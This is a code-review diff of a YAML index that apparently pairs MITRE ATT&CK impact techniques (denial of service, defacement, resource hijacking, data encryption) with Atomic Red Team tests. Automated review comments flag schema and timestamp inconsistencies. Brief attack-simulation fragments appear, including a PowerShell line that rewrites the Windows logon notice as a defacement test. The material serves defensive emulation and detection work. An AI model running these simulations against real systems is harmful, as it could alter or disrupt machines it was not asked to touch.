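Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 and, unlike the other keys this patch removes, is not re-added lower down in the reordered object; if the field is gone from the upstream bundle that is expected, but anything in the repository that filters or displays on permissions_required should be checked before this lands.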
@@ -114130,6 +114905,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -114145,17 +114921,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
@@ -114165,14 +114936,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -114181,28 +114953,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -114213,7 +114985,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -114224,17 +114995,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -114271,7 +115037,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -114292,7 +115059,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
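Review bot: `modified` for T1491 moves backward, from `'2022-05-11T14:00:00.188Z'` to `'2022-03-25T19:34:42.056Z'`, the second such regression in this patch after T1561; because the surrounding T1491 keys keep the old ordering (`external_references` ahead of `modified`, `modified` ahead of `name`) this object does not look as though it was regenerated in the new layout at all, so check which bundle it came from.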
@@ -114319,12 +115086,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
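Review bot: T1491 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here and, unlike every other object in the patch, gets no `x_mitre_attack_spec_version: 3.2.0` / `x_mitre_modified_by_ref` pair back at the end of the object; it now ends at `x_mitre_is_subtechnique: false` with no spec version at all, which reads as a generator inconsistency rather than an intended change. The new T1496.002 block is consistent with the other regenerated objects, including the empty `x_mitre_detection: ''`.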
@@ -114357,7 +115190,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -114367,10 +115200,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
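Review bot: for T1657 the `Office 365` and `Google Workspace` platforms are replaced by a single `Office Suite` entry with `x_mitre_version` bumped to '1.2'; this is a rename rather than a drop, so any per-platform index keyed on the old platform names will silently lose this technique unless the indexer also knows the new name.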
@@ -114433,7 +115265,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -114474,7 +115305,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
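Review bot: `modified` for T1491.001 also moves backward (`'2022-11-08T14:00:00.188Z'` to `'2022-07-28T18:55:35.988Z'`), and the object keeps the old key order (`modified`, `created_by_ref`, `name` following the description), so like T1491 it does not appear to come from the same bundle as the objects bumped to 3.2.0.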
@@ -114495,7 +115326,6 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests:
- name: Replace Desktop Wallpaper
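Review bot: `x_mitre_attack_spec_version: 2.1.0` is left in place for T1491.001 while `spec_version: '2.1'` is dropped, so this object will be one of the few in the index still at 2.1.0 after the others move to 3.2.0; either leave both fields untouched for objects that were not regenerated or bump this one as well, because the mixed state is confusing for anything that checks the spec version.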
@@ -114586,6 +115416,155 @@ impact:
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
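Review bot: the description string for the "Sysdig LLMJacking 2024" reference in the new T1496.004 entry is title-first ('LLMjacking: Stolen Cloud Credentials Used in New AI Attack. (2024, May 6). Alessandro Brucato.') while every other external_references entry in this file is author-first. It is upstream ATT&CK reference text, so it should not be hand-edited in a generated index, but it is worth reporting upstream if this index is rendered for display. Otherwise the two new entries (T1496.004 and T1496.001) follow the same layout as the existing test-less techniques: `atomic_tests: []` with no `identifier` key, exactly as T1565 directly below, so the generator output looks consistent.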
@@ -114638,11 +115617,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
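Review bot: this hunk drops `spec_version: '2.1'` from the technique object, and the same removal repeats in nearly every hunk below (T1531, T1486, T1499, T1496, T1565.002, T1485, T1498, T1490, T1529). `x_mitre_attack_spec_version` is kept, so the ATT&CK data version is still recorded, but any consumer that treats the embedded `technique` maps as STIX 2.1 objects loses a required property. Suggest stating the removal in the PR description as a deliberate schema change of the generator rather than leaving reviewers to infer it from the repetition.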
@@ -114665,6 +115643,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -114682,9 +115661,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -114710,9 +115690,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests:
- name: Change User Password - Windows
@@ -115042,7 +116021,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
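Review bot: the `modified` timestamp for T1486 moves backwards here, from '2022-11-08T14:00:00.188Z' to '2022-06-16T13:07:10.318Z', and the same regression appears for T1529 ('2023-05-09' to '2023-03-22') and T1133 ('2023-05-09' to '2023-03-30') further down. Every other `modified` change in this diff moves forward, so these three suggest the previous index was generated from a bundle whose timestamps had been rewritten. Confirm the new values come from the intended ATT&CK release before merging; a consumer that compares `modified` to detect updates will otherwise treat these entries as stale.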
@@ -115066,7 +116045,6 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests:
- name: Encrypt files using gpg (FreeBSD/Linux)
@@ -115441,7 +116419,7 @@ impact:
cleanup_command: "del $env:Userprofile\\Desktop\\akira_readme.txt \ndel c:\\test.*.akira\n"
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -115460,7 +116438,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -115477,18 +116454,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
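Review bot: in the T1499 platform list, `- IaaS` is removed at its old position and re-added after `- Containers`, a no-op that makes the hunk read as if IaaS were dropped. The real change is that Azure AD, Office 365, SaaS and Google Workspace are removed and x_mitre_version goes from 1.1 to 1.2. Dropping SaaS removes this technique from the SaaS-scoped index; if that matches the upstream platform list it is fine, but it is easy to miss behind the reorder, so call it out in the PR description. Emitting platforms in a stable sorted order from the generator would avoid these spurious remove/add pairs in future diffs.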
@@ -115512,8 +116484,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -115533,33 +116505,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -115570,7 +116531,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -115587,8 +116548,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -115607,39 +116571,14 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
